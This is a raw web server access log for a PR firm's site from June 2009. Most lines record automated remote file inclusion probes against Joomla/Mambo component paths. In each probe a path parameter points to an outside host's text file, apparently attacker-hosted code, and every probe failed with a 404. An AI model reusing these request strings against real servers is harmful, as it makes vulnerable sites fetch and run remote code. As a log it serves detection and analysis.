75.145.152.113 - - [13/Jun/2009:00:44:33 -0700] "GET /index.php?option=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:00:44:33 -0700] "GET /logs//index.php?option=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:00:44:33 -0700] "GET /logs/access_070812.log//index.php?option=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:00:44:40 -0700] "GET /logs/access_071012.log//index.php?option=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:00:45:27 -0700] "GET /logs/access_070812.log//index.php?option=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:00:45:27 -0700] "GET /index.php?option=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:00:45:27 -0700] "GET /logs//index.php?option=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:00:45:32 -0700] "GET /logs/access_071012.log//index.php?option=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:45:59 -0700] "GET / HTTP/1.0" 200 9405 "http://www.prfirmfinder.com/profile/b.507.r.98783.u.d9ef5b.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:45:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "http://www.prfirmfinder.com/profile/b.507.r.98783.u.d9ef5b.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:46:01 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.0" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:46:02 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.0" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:46:02 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.0" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:46:03 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.0" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:46:03 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.0" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:46:03 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.0" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:00:46:03 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.0" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:00:47:07 -0700] "GET /logs/access_070812.log%20%20//index.php?option=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:00:47:07 -0700] "GET /logs/access_071012.log%20%20//index.php?option=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:00:47:45 -0700] "GET /logs/access_070812.log%20%20//index.php?option=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:00:47:46 -0700] "GET /logs/access_071012.log%20%20//index.php?option=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:00:49:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:01:00:38 -0700] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:01:00:38 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:01:00:39 -0700] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:01:00:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:01:00:39 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.147.206 - - [13/Jun/2009:01:00:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.megaraskrutka.ru/icf.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:01:02:57 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:01:02:57 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:01:10:02 -0700] "GET /logs/access_071012.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:17:36 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:17:36 -0700] "GET /logs/access_071212.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:17:36 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:21:54 -0700] "GET /logs/access_071212.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:22:56 -0700] "GET /logs/access_070912.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.124.127.164 - - [13/Jun/2009:01:26:54 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.124.127.164 - - [13/Jun/2009:01:26:54 -0700] "GET /logs/access_071212.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.124.127.164 - - [13/Jun/2009:01:26:55 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.124.127.164 - - [13/Jun/2009:01:27:25 -0700] "GET /logs/access_071212.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:11 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:11 -0700] "GET /logs/access_070812.log/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:12 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:14 -0700] "GET /logs/access_071012.log/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:25 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:25 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:25 -0700] "GET /logs/access_070812.log%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:29:26 -0700] "GET /logs/access_071012.log%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.124.127.164 - - [13/Jun/2009:01:29:29 -0700] "GET /logs/access_071112.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:30:04 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:30:05 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:30:05 -0700] "GET /logs/access_070812.log/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:30:08 -0700] "GET /logs/access_071012.log/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:32:09 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:32:09 -0700] "GET /logs/access_070812.log/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:32:09 -0700] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:32:11 -0700] "GET /logs/access_071012.log/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.124.127.164 - - [13/Jun/2009:01:35:54 -0700] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:42:06 -0700] "GET /logs/access_071012.log%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.76.181 - - [13/Jun/2009:01:42:06 -0700] "GET /logs/access_070812.log%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
60.251.217.4 - - [13/Jun/2009:01:48:45 -0700] "GET /logs/access_071112.log%20%20//ask_password.php?%20dir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
60.251.217.4 - - [13/Jun/2009:01:48:49 -0700] "GET /ask_password.php?%20dir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
60.251.217.4 - - [13/Jun/2009:01:48:49 -0700] "GET /logs//ask_password.php?%20dir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:01:52:03 -0700] "GET /logs/access_070612.log//mambo/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:01:52:03 -0700] "GET /logs//mambo/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:01:52:03 -0700] "GET /mambo/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.223.3.98 - - [13/Jun/2009:01:56:21 -0700] "GET /logs//include/write.php?dir=http://vs-edling.de/admin/img/tes??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
89.223.3.98 - - [13/Jun/2009:01:56:21 -0700] "GET /include/write.php?dir=http://vs-edling.de/admin/img/tes??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:57:19 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:57:19 -0700] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:01:57:19 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:02:05:29 -0700] "GET / HTTP/1.0" 200 9405 "http://www.helpmypr.com/profile.b.507.r.98783.u.d9ef5b.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:02:05:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "http://www.helpmypr.com/profile.b.507.r.98783.u.d9ef5b.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:02:05:31 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.0" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:02:05:32 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.0" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:02:05:32 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.0" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
68.110.212.54 - - [13/Jun/2009:02:05:34 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.0" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:02:15:37 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:02:15:37 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:02:15:37 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:02:15:45 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
60.251.217.4 - - [13/Jun/2009:02:16:52 -0700] "GET /logs/access_071112.log%20%20//setup.php?%20dir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
60.251.217.4 - - [13/Jun/2009:02:16:56 -0700] "GET /setup.php?%20dir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
60.251.217.4 - - [13/Jun/2009:02:16:56 -0700] "GET /logs//setup.php?%20dir=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:02:19:02 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.230.22.39 - - [13/Jun/2009:02:19:08 -0700] "GET /logs/access_071012.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:08 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:08 -0700] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:09 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:09 -0700] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:15 -0700] "GET /logs/access_071012.log//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:27:19 -0700] "GET /logs/access_071012.log//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:45:42 -0700] "GET /logs/access_071112.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:45:52 -0700] "GET /logs/access_070812.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:47:12 -0700] "GET /logs/access_071112.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:02:47:25 -0700] "GET /logs/access_070812.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [13/Jun/2009:02:50:44 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [13/Jun/2009:02:50:45 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [13/Jun/2009:02:50:45 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [13/Jun/2009:02:50:45 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
